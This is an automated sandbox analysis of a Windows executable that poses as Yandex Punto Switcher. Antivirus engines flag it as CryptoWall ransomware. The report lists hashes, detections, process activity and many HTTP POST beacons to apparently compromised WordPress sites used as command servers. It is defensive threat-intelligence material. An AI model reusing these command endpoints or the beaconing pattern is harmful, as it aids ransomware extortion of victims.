Analysis Date2018-04-11 17:50:58
MD5e926f5f98b3f027611430d077a6b23d2
SHA1608482b5ad4284b597d41f4931271ec4987a8907

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 57cded31835b8fd29b5f7402ac2242fe sha1: 09179b4d79f516bd3cc6d885eacb9c6542fd96ae size: 16384
Section.rdata md5: cb77e80b7e4d3049630307e2f1f5e496 sha1: 31efde16999549c571b02b61151ad094a6f0528f size: 2560
Section.data md5: 0c8dc7ff5c53b16ae8b0e4dce4ad2fb1 sha1: 4664a356d7dad096bd429081602e7e7bd50ed41b size: 158208
Section.rsrc md5: 2bf672128633f63baf9cd2ba5cbb688e sha1: 8034764aeb280caee54f36fa875d7d29293d6bb2 size: 17920
Timestamp2015-04-27 22:45:09
VersionLegalCopyright: Copyright 2008-2011 ООО Яндекс
InternalName: Choose Layouts
FileVersion: 3, 2, 7, 84
CompanyName: ООО Яндекс
LegalTrademarks: Punto Switcher
Comments: Выбор раскладок для Punto Switcher
ProductName: Punto Switcher
ProductVersion: 3, 2, 7, 84
FileDescription: Раскладки для Punto Switcher
OriginalFilename: layouts.exe
PackerBorland Delphi 3.0 (???)
PEhashea61b5519ce2a446ddfd9a72c5312e99760293bf
IMPhash7af3e4602a729252b0b111cdc9fd28b8
AVK7Error Scanning File
AVMcafeeRansom-CWall.a
AVF-SecureTrojan.GenericKD.2328623
AVAvira (antivir)TR/Crowti.A.282
AVMicrosoft Security EssentialsNo Virus
AVBullGuardTrojan.GenericKD.2328623
AVAd-AwareTrojan.GenericKD.2328623
AVAuthentiumW32/Trojan.FREG-3536
AVMalwareBytesNo Virus
AVSUPERAntiSpywareTrojan.Agent/Gen-Kazy
AVFrisk (f-prot)W32/Trojan2.ORVO
AVNANOTrojan.Win32.Zbot.drbriz
AVEset (nod32)Win32/Filecoder.CryptoWall.D
AVFortinetError Scanning File
AVEmsisoftTrojan.GenericKD.2328623
AVArcabit (arcavir)Trojan.GenericKD.2328623
AVTrend MicroTROJ_CR.C2C628E1
AVMicroWorld (escan)Error Scanning File
AVGrisoft (avg)Crypt4.WNT
AVTwisterW32.Filecoder.CO.urwz
AVBitDefenderTrojan.GenericKD.2328623
AVWindows DefenderNo Virus
AVCAT (quickheal)TrojanDwnldr.Cutwail.BF5
AVZillya!Trojan.Zbot.Win32.179579
AVClamAVError Scanning File
AVAlwil (avast)Win32:Malware-gen
AVCA (E-Trust Ino)Error Scanning File
AVIkarusError Scanning File
AVDr. WebTrojan.Encoder.514
AVPadvishNo Virus
AVAlwil (avast)Malware-gen
AVSymantecPacked.Generic.459
AV360 SafeNo Virus
AVKasperskyTrojan.Win32.Generic
AVVirusBlokAda (vba32)No Virus
AVRisingNo Virus

Runtime Details:

Screenshot

Process
↳ C:\Windows\System32\lsass.exe

Process
↳ C:\Users\Phil\AppData\Local\Temp\608482b5ad4284b597d41f4931271ec4987a8907.exe

Creates FileC:\Users\Phil\AppData\Local\Temp\56498489498489
Creates FileC:\Users\Phil\AppData\Local\Temp
Creates FileC:\Windows\SysWOW64\explorer.exe

Network Details:

DNSip-addr.es
Type: A
188.165.164.184
DNSmyexternalip.com
Type: A
81.169.172.124
DNScurlmyip.com
Type: A
184.106.112.172
DNSsplubiczdolny.edu.pl
Type: A
87.98.239.87
DNSdornfilm.de
Type: A
82.165.27.189
DNScomplementaire.sante-dz.org
Type: A
72.55.164.151
DNSkleurvandeverleiding.nl
Type: A
5.39.186.193
DNSbilligaresorguiden.se
Type: A
213.212.61.142
DNSelections-presidentielles-france.fr
Type: A
213.186.33.104
DNSrunlove.us
Type: A
204.152.254.221
DNSpragueamigos.cz
Type: A
195.140.255.216
DNSarttel.ro
Type: A
82.79.33.30
DNScqttxx.com
Type: A
112.125.17.103
DNSkeralaayurtheeram.com
Type: A
192.185.182.214
DNSprintdominica.com
Type: A
192.254.232.70
DNSbestambassador.net
Type: A
153.121.67.31
DNScodeofconduct.fi
Type: A
188.165.143.3
DNSglutenfreevermont.com
Type: A
72.167.244.229
DNSeuajut.ro
Type: A
194.105.29.134
DNSdhs92.com
Type: A
69.73.168.159
DNSczajkaczajka.com
Type: A
188.116.20.101
DNScomarksecurity.com
Type: A
72.34.49.86
DNSenglish.cadpro.vn
Type: A
113.160.56.26
DNSazawakh-azavak.cz
Type: A
93.190.48.7
DNSstockmarketinsiders.com
Type: A
103.6.198.15
DNSmuncmedia.com
Type: A
50.56.178.10
DNSelitson.com
Type: A
103.6.196.199
DNSgreenschools.com.my
Type: A
103.6.196.199
DNSthespiritualhealth.com
Type: A
199.83.209.254
DNSe-magazalar.com
Type: A
192.254.235.115
DNSlifaco.cc
Type: A
205.234.144.58
DNSsupportive.com.tr
Type: A
94.73.161.178
DNSquarrelbeauty.com
Type: A
216.222.194.11
DNSadvitam.pt
Type: A
176.221.32.80
DNSmarcelmartins.com.br
Type: A
187.85.78.21
DNSmaptote.com
Type: A
216.70.101.218
DNSpietraistanbul.com
Type: A
46.28.239.225
DNSkritischerkonsum.uni-koeln.de
Type: A
DNSyorkshiresigns.co.uk
Type: A
DNSpatrakom.co.id
Type: A
HTTP GEThttp://ip-addr.es/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://myexternalip.com/raw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://curlmyip.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://splubiczdolny.edu.pl/wp-content/themes/happykids/img1.php?w=f4cv5rcesvy
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://dornfilm.de/handler/img3.php?w=f4cv5rcesvy
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://complementaire.sante-dz.org/news/wp-content/themes/sante/img1.php?g=f4cv5rcesvy
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://kleurvandeverleiding.nl/wp-content/themes/Divi/img3.php?m=f4cv5rcesvy
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://billigaresorguiden.se/wp-content/themes/chic-bank/img3.php?a=f4cv5rcesvy
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://elections-presidentielles-france.fr/wp-content/themes/theme1917/img5.php?a=f4cv5rcesvy
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://runlove.us/wp-content/themes/twentyfifteen/img5.php?n=f4cv5rcesvy
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://pragueamigos.cz/wp-content/themes/themeboy_football_club_v2.0.8/img2.php?p=f4cv5rcesvy
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://arttel.ro/blog/wp-content/themes/Chucky/img5.php?b=f4cv5rcesvy
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://cqttxx.com/wp-content/themes/cqttxx/img2.php?s=f4cv5rcesvy
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://keralaayurtheeram.com/wp-content/themes/kingsize/img2.php?s=f4cv5rcesvy
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://printdominica.com/wp-content/themes/Avada-Theme/img3.php?m=f4cv5rcesvy
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://bestambassador.net/news/wp-content/themes/twentythirteen/img2.php?x=f4cv5rcesvy
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://codeofconduct.fi/wp-content/themes/niinanV2/img4.php?c=f4cv5rcesvy
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://glutenfreevermont.com/wp-content/themes/twentyeleven/img5.php?v=f4cv5rcesvy
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://euajut.ro/wp-content/uploads/img4.php?j=f4cv5rcesvy
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://dhs92.com/wp-content/themes/lightweight/img4.php?z=f4cv5rcesvy
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://czajkaczajka.com/wp-content/themes/dt-the7-Theme/img3.php?w=f4cv5rcesvy
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://comarksecurity.com/wp-content/themes/grizzly/img5.php?n=f4cv5rcesvy
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://english.cadpro.vn/images/img3.php?r=f4cv5rcesvy
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://azawakh-azavak.cz/wp-content/themes/pixeled/img1.php?j=f4cv5rcesvy
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://85.214.90.210/img1.php?r=f4cv5rcesvy
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://stockmarketinsiders.com/wp-content/themes/Impreza/img2.php?h=f4cv5rcesvy
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://muncmedia.com/wp-content/themes/lightweight/img2.php?e=f4cv5rcesvy
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://elitson.com/wp-content/themes/rttheme18/img1.php?m=f4cv5rcesvy
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://greenschools.com.my/wp-content/themes/gc/img1.php?b=f4cv5rcesvy
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://thespiritualhealth.com/wp-content/themes/lightweight/img4.php?x=f4cv5rcesvy
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://e-magazalar.com/wp-content/themes/em/img2.php?c=f4cv5rcesvy
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://lifaco.cc/img4.php?d=f4cv5rcesvy
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://supportive.com.tr/wp-content/themes/pindol/img3.php?d=f4cv5rcesvy
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://quarrelbeauty.com/wp-content/themes/template2/img4.php?o=f4cv5rcesvy
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://advitam.pt/wp-content/themes/pptitan/img2.php?k=f4cv5rcesvy
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://marcelmartins.com.br/blog/wp-content/themes/marcelmartins/img1.php?r=f4cv5rcesvy
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://maptote.com/blog/wp-content/themes/maptote-com/img5.php?r=f4cv5rcesvy
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://pietraistanbul.com/wp-content/themes/camilla/img1.php?h=f4cv5rcesvy
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://ip-addr.es/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://myexternalip.com/raw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://curlmyip.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://splubiczdolny.edu.pl/wp-content/themes/happykids/img1.php?v=105reu42tykq
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://dornfilm.de/handler/img3.php?o=105reu42tykq
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://complementaire.sante-dz.org/news/wp-content/themes/sante/img1.php?n=105reu42tykq
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://kleurvandeverleiding.nl/wp-content/themes/Divi/img3.php?d=105reu42tykq
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://billigaresorguiden.se/wp-content/themes/chic-bank/img3.php?a=105reu42tykq
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://elections-presidentielles-france.fr/wp-content/themes/theme1917/img5.php?u=105reu42tykq
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://runlove.us/wp-content/themes/twentyfifteen/img5.php?e=105reu42tykq
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://pragueamigos.cz/wp-content/themes/themeboy_football_club_v2.0.8/img2.php?o=105reu42tykq
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://arttel.ro/blog/wp-content/themes/Chucky/img5.php?g=105reu42tykq
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://cqttxx.com/wp-content/themes/cqttxx/img2.php?g=105reu42tykq
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://keralaayurtheeram.com/wp-content/themes/kingsize/img2.php?n=105reu42tykq
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://printdominica.com/wp-content/themes/Avada-Theme/img3.php?a=105reu42tykq
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://bestambassador.net/news/wp-content/themes/twentythirteen/img2.php?a=105reu42tykq
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://codeofconduct.fi/wp-content/themes/niinanV2/img4.php?m=105reu42tykq
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://glutenfreevermont.com/wp-content/themes/twentyeleven/img5.php?o=105reu42tykq
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://euajut.ro/wp-content/uploads/img4.php?r=105reu42tykq
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://dhs92.com/wp-content/themes/lightweight/img4.php?e=105reu42tykq
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://czajkaczajka.com/wp-content/themes/dt-the7-Theme/img3.php?k=105reu42tykq
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://comarksecurity.com/wp-content/themes/grizzly/img5.php?y=105reu42tykq
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://english.cadpro.vn/images/img3.php?d=105reu42tykq
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://azawakh-azavak.cz/wp-content/themes/pixeled/img1.php?v=105reu42tykq
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://85.214.90.210/img1.php?v=105reu42tykq
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://stockmarketinsiders.com/wp-content/themes/Impreza/img2.php?o=105reu42tykq
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://muncmedia.com/wp-content/themes/lightweight/img2.php?d=105reu42tykq
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://elitson.com/wp-content/themes/rttheme18/img1.php?w=105reu42tykq
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://greenschools.com.my/wp-content/themes/gc/img1.php?o=105reu42tykq
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://thespiritualhealth.com/wp-content/themes/lightweight/img4.php?l=105reu42tykq
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://e-magazalar.com/wp-content/themes/em/img2.php?u=105reu42tykq
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://lifaco.cc/img4.php?w=105reu42tykq
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://supportive.com.tr/wp-content/themes/pindol/img3.php?d=105reu42tykq
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://quarrelbeauty.com/wp-content/themes/template2/img4.php?b=105reu42tykq
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://advitam.pt/wp-content/themes/pptitan/img2.php?w=105reu42tykq
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://marcelmartins.com.br/blog/wp-content/themes/marcelmartins/img1.php?v=105reu42tykq
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://maptote.com/blog/wp-content/themes/maptote-com/img5.php?a=105reu42tykq
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://pietraistanbul.com/wp-content/themes/camilla/img1.php?p=105reu42tykq
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://ip-addr.es/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://myexternalip.com/raw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://curlmyip.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://splubiczdolny.edu.pl/wp-content/themes/happykids/img1.php?k=c8nxv56r8k6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://dornfilm.de/handler/img3.php?a=c8nxv56r8k6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://complementaire.sante-dz.org/news/wp-content/themes/sante/img1.php?s=c8nxv56r8k6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://kleurvandeverleiding.nl/wp-content/themes/Divi/img3.php?h=c8nxv56r8k6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://billigaresorguiden.se/wp-content/themes/chic-bank/img3.php?u=c8nxv56r8k6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://elections-presidentielles-france.fr/wp-content/themes/theme1917/img5.php?e=c8nxv56r8k6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://runlove.us/wp-content/themes/twentyfifteen/img5.php?v=c8nxv56r8k6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://pragueamigos.cz/wp-content/themes/themeboy_football_club_v2.0.8/img2.php?t=c8nxv56r8k6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://arttel.ro/blog/wp-content/themes/Chucky/img5.php?o=c8nxv56r8k6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://cqttxx.com/wp-content/themes/cqttxx/img2.php?q=c8nxv56r8k6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://keralaayurtheeram.com/wp-content/themes/kingsize/img2.php?d=c8nxv56r8k6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://printdominica.com/wp-content/themes/Avada-Theme/img3.php?a=c8nxv56r8k6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://bestambassador.net/news/wp-content/themes/twentythirteen/img2.php?t=c8nxv56r8k6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://codeofconduct.fi/wp-content/themes/niinanV2/img4.php?f=c8nxv56r8k6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://glutenfreevermont.com/wp-content/themes/twentyeleven/img5.php?l=c8nxv56r8k6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://euajut.ro/wp-content/uploads/img4.php?q=c8nxv56r8k6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://dhs92.com/wp-content/themes/lightweight/img4.php?a=c8nxv56r8k6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://czajkaczajka.com/wp-content/themes/dt-the7-Theme/img3.php?v=c8nxv56r8k6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://comarksecurity.com/wp-content/themes/grizzly/img5.php?v=c8nxv56r8k6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://english.cadpro.vn/images/img3.php?y=c8nxv56r8k6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://azawakh-azavak.cz/wp-content/themes/pixeled/img1.php?r=c8nxv56r8k6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://85.214.90.210/img1.php?v=c8nxv56r8k6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://stockmarketinsiders.com/wp-content/themes/Impreza/img2.php?m=c8nxv56r8k6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://muncmedia.com/wp-content/themes/lightweight/img2.php?q=c8nxv56r8k6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://elitson.com/wp-content/themes/rttheme18/img1.php?y=c8nxv56r8k6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://greenschools.com.my/wp-content/themes/gc/img1.php?o=c8nxv56r8k6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://thespiritualhealth.com/wp-content/themes/lightweight/img4.php?u=c8nxv56r8k6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://e-magazalar.com/wp-content/themes/em/img2.php?b=c8nxv56r8k6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://lifaco.cc/img4.php?u=c8nxv56r8k6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://supportive.com.tr/wp-content/themes/pindol/img3.php?y=c8nxv56r8k6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1031 ➝ 188.165.164.184:80
Flows TCP192.168.1.1:1032 ➝ 81.169.172.124:80
Flows TCP192.168.1.1:1033 ➝ 184.106.112.172:80
Flows TCP192.168.1.1:1034 ➝ 87.98.239.87:80
Flows TCP192.168.1.1:1035 ➝ 82.165.27.189:80
Flows TCP192.168.1.1:1036 ➝ 72.55.164.151:80
Flows TCP192.168.1.1:1037 ➝ 5.39.186.193:80
Flows TCP192.168.1.1:1038 ➝ 213.212.61.142:80
Flows TCP192.168.1.1:1039 ➝ 213.186.33.104:80
Flows TCP192.168.1.1:1040 ➝ 204.152.254.221:80
Flows TCP192.168.1.1:1041 ➝ 195.140.255.216:80
Flows TCP192.168.1.1:1042 ➝ 82.79.33.30:80
Flows TCP192.168.1.1:1043 ➝ 112.125.17.103:80
Flows TCP192.168.1.1:1044 ➝ 192.185.182.214:80
Flows TCP192.168.1.1:1045 ➝ 192.254.232.70:80
Flows TCP192.168.1.1:1046 ➝ 153.121.67.31:80
Flows TCP192.168.1.1:1047 ➝ 188.165.143.3:80
Flows TCP192.168.1.1:1048 ➝ 72.167.244.229:80
Flows TCP192.168.1.1:1049 ➝ 194.105.29.134:80
Flows TCP192.168.1.1:1050 ➝ 69.73.168.159:80
Flows TCP192.168.1.1:1051 ➝ 188.116.20.101:80
Flows TCP192.168.1.1:1052 ➝ 72.34.49.86:80
Flows TCP192.168.1.1:1053 ➝ 113.160.56.26:80
Flows TCP192.168.1.1:1054 ➝ 93.190.48.7:80
Flows TCP192.168.1.1:1055 ➝ 85.214.90.210:80
Flows TCP192.168.1.1:1056 ➝ 103.6.198.15:80
Flows TCP192.168.1.1:1057 ➝ 50.56.178.10:80
Flows TCP192.168.1.1:1058 ➝ 103.6.196.199:80
